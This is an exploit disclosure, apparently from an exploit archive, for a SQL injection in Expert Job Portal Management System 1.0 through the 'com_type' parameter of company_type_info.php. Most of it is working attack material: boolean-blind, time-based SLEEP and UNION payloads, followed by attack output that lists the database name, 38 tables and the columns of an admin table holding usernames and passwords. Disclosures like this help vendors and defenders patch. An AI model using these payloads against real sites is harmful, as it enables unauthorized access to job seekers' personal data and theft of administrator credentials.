Expert Job Portal Management System version 1.0 suffers from a remote SQL injection vulnerability.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Vulnerability ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : https://www.codester.com/items/20720/ │
│ Vendor : Expert IT Solution │
│ Software : Expert Job Portal Management System 1.0 │
│ Vuln Type: SQL Injection │
│ Impact : Database Access │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ │
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │
│ data and crash the application or make it unavailable, leading to lost revenue and │
│ damage to a company's reputation. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/0x0CryptoJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Path: /company_type_info.php
https://website/company_type_info.php?com_type=Agent
GET parameter 'com_type' is vulnerable to SQL Injection
---
Parameter: com_type (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: com_type=Agent' AND 3360=3360 AND 'rCfC'='rCfC
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: com_type=Agent' AND (SELECT 4512 FROM (SELECT(SLEEP(5)))SCiH) AND 'MKSc'='MKSc
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: com_type=Agent' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171787071,0x5174744e6d58704d494d494952476c6f4c666346534b45754e57696b444b45794e5758567a6e6163,0x71627a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[+] Starting the Attack
fetching current database
current database: 'sagor_****_job'
fetching tables
[38 tables]
+---------------------------------+
| all_country |
| city_manage |
| company_type |
| contact_manage |
| content_manage |
| division_manage |
| enroll_trainning |
| exp_settings |
| job_apply |
| job_categories |
| job_listing |
| job_seeker_carieer_details |
| job_seeker_education |
| job_seeker_emp_histo |
| job_seeker_image |
| job_seeker_info |
| job_seeker_lang_pro |
| job_seeker_other_relatiive_info |
| job_seeker_pref_details |
| job_seeker_profess_info |
| job_seeker_reff |
| job_seeker_resume |
| job_seeker_specialization |
| job_seeker_training |
| job_seeker_upload_resume |
| languages |
| package |
| pages |
| recurator_info |
| recurator_verification |
| save_jobs |
| social_manage |
| subscribe |
| sup_ad_log |
| testmonial_manage |
| timezones |
| trainning_category |
| trainning_manage |
+---------------------------------+
fetching columns for table 'sup_ad_log'
[6 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| status | int(11) |
| admin_role | int(11) |
| email | varchar(100) |
| id | int(11) |
| sup_pass | varchar(100) |
| sup_user | varchar(100) |
+------------+--------------+
[-] Done
